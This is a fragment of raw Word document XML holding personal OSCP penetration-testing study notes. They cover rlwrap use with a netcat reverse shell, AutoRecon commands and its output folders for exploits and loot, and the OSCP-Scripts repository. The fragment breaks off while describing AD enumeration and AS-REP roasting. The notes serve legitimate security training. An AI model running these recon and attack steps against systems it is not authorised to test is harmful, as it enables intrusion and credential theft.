        <w:t xml:space="preserve">Complete filenames in the current directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This enables </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tab-completion </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for filenames when typing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="574"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Doesn't seem to work sometimes. It sometimes autocorrects to files that are on my local kali instead of the ones in the reverse shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000028E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="574"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "-</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag means Always remain in "readline" mode. Without this, rlwrap may exit when the underlying command (like nc) switches modes (e.g., from interactive input to sending output).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A makes rlwrap stay active</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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I think the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">f</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lag is really helpful, but maybe avoid the -A flag</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4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_emx49toal5ye" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AutoRecon</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hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Tib3rius/AutoRecon</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a script it taking too long, you can dynamically change the verbosity while autorecon is still running to see what the script is. You can do this by hitting the up and down arrow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000299">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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To run as sudo, use one of the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="809"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo $(which autorecon) -t targets.txt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="809"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo env "PATH=$PATH" autorecon -t targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000029E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="809"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to exclude dirbusting, then add: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--exclude-tags=dirbuster</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to run it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">autorecon -t targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">autorecon -v -t targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A3">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo $(which autorecon) -v -t targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo $(which autorecon) -t targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">targets.txt is a file with all the IPs, and it's one IP per line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Some notes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1216"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you already have a "results" folder, and then you want to run autorecon on new targets, just run autorecon. It won't delete any previous folders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1216"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you run autorecon twice on the same machine, the second time it will overwrite all the files in the original</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I installed using pipx, so to update, just run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="677"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pipx upgrade autorecon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2921000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="271" name="image263.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image263.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId2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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit directory is intended to contain any exploit code you download / write for the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The loot directory is intended to contain any loot (e.g. hashes, interesting files) you find on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The report directory contains some auto-generated files and directories that are useful for reporting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="759"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local.txt can be used to store the local.txt flag found on targets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="759"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">notes.txt should contain a basic template where you can write notes for each service discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="759"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proof.txt can be used to store the proof.txt flag found on targets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="759"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The screenshots directory is intended to contain the screenshots you use to document the exploitation of the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The scans directory is where all results from scans performed by AutoRecon will go. This includes port scans / service detection scans, as well as any service enumeration scans. It also contains two other files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_commands.log contains a list of every command AutoRecon ran against the target. This is useful if one of the commands fails and you want to run it again with modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_manual_commands.txt contains any commands that are deemed "too dangerous" to run automatically, either because they are too intrusive, require modification based on human analysis, or just work better when there is a human monitoring them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, directories are created for each open port (e.g. tcp80, udp53) and scan results for the services found on those ports are stored in their respective directories. You can disable this behavior using the --no-port-dirs command line option, and scan results will instead be stored in the scans directory itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a scan results in an error, a file called _errors.log will also appear in the scans directory with some details to alert the user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If output matches a defined pattern, a file called _patterns.log will also appear in the scans directory with details about the matched output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The scans/xml directory stores any XML output (e.g. from Nmap scans) separately from the main scan outputs, so that the scans directory itself does not get too cluttered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jypauk9xvt29" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-Scripts</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A tool from Github with scripts that are made for OSCP: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/yaldobaoth/OSCP-Scripts#</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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But, they are incredibly useful and can definitely be used for beyond OSCP</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The scripts are located in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/oscp-scripts </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The github clone is in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~/Downloads/OSCP-Scripts</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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All scripts are added to PATH so you can run them from anywhere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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">My favorites include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="378"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">enum-AD:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which gives a list of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">domain users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, does bloodhound ingest (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I disabled this</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), does </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AS-REP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
